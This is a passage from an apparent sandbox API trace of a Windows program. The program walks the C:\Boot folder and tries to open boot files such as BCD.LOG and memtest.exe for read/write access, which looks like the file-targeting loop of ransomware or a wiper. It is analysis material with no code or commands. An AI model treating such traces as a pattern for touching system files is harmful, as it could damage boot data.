cAlternateFileName="")) returned 1 [0183.197] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9578e980, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x35246c20, ftLastAccessTime.dwHighDateTime=0x1d8a73e, ftLastWriteTime.dwLowDateTime=0x9219e170, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0183.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.197] PathFindExtensionW (pszPath="C:\\Boot\\BCD") returned="" [0183.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0183.197] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9578e980, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x9578e980, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x9212bd50, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x6400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0183.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.197] PathFindExtensionW (pszPath="C:\\Boot\\BCD.LOG") returned=".LOG" [0183.197] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0183.198] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9578e980, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x9578e980, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x9578e980, ftLastWriteTime.dwHighDateTime=0x1d70554, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0183.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42510 [0183.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0183.199] PathFindExtensionW (pszPath="C:\\Boot\\BCD.LOG1") returned=".LOG1" [0183.199] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42510 | out: hHeap=0x2c0000) returned 1 [0183.200] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9578e980, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x9578e980, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x9578e980, ftLastWriteTime.dwHighDateTime=0x1d70554, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0183.200] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.200] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42510 [0183.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0183.200] PathFindExtensionW (pszPath="C:\\Boot\\BCD.LOG2") returned=".LOG2" [0183.200] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.201] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42510 | out: hHeap=0x2c0000) returned 1 [0183.201] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9571c560, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x9571c560, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x9571c560, ftLastWriteTime.dwHighDateTime=0x1d70554, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0183.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42510 [0183.201] PathFindExtensionW (pszPath="C:\\Boot\\BOOTSTAT.DAT") returned=".DAT" [0183.201] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.201] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9565de80, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d38220, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d38220, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0183.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e50 [0183.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7838 [0183.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7888 [0183.202] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0183.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e50 [0183.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x38) returned 0x2a05de8 [0183.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ab8 [0183.202] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0183.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e50 [0183.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x54) returned 0x29b9ed0 [0183.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7888 [0183.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ae0 [0183.202] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0183.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e50 [0183.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0183.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ab8 [0183.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7b08 [0183.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7b30 [0183.203] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0183.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e50 [0183.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa8) returned 0x29edc48 [0183.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ae0 [0183.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7888 [0183.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7b58 [0183.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7b80 [0183.203] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0183.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e50 [0183.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7b30 [0183.204] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0183.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e50 [0183.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xfc) returned 0x2f5b18 [0183.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7b08 [0183.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ab8 [0183.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0183.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7bd0 [0183.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0183.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0183.204] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9571c560, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x95768820, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x95768820, ftLastWriteTime.dwHighDateTime=0x1d70554, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0183.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e50 [0183.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7838 [0183.204] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0183.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e50 [0183.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7b80 [0183.204] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0183.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e50 [0183.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x16c) returned 0x29f16c8 [0183.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7b58 [0183.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7888 [0183.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ae0 [0183.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad79a0 [0183.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad75e0 [0183.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0183.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0183.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0183.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7770 [0183.205] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0183.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e50 [0183.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7838 [0183.205] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0183.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e50 [0183.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7b30 [0183.205] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0183.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e50 [0183.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0183.206] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xce3b5a40, ftLastWriteTime.dwHighDateTime=0x1d03f5f, nFileSizeHigh=0x0, nFileSizeLow=0x795b8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0183.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42510 [0183.206] PathFindExtensionW (pszPath="C:\\Boot\\memtest.exe") returned=".exe" [0183.206] CreateFileW (lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.225] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0183.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e50 [0183.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x214) returned 0x2a7d6f0 [0183.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0183.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7bd0 [0183.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0183.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ab8 [0183.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7b08 [0183.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7748 [0183.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76f8 [0183.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7658 [0183.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7720 [0183.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad78b0 [0183.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77e8 [0183.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7900 [0183.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a90 [0183.225] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0183.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e50 [0183.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7b30 [0183.225] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0183.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e50 [0183.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7838 [0183.226] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0183.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e50 [0183.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7b80 [0183.226] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0183.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e50 [0183.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) 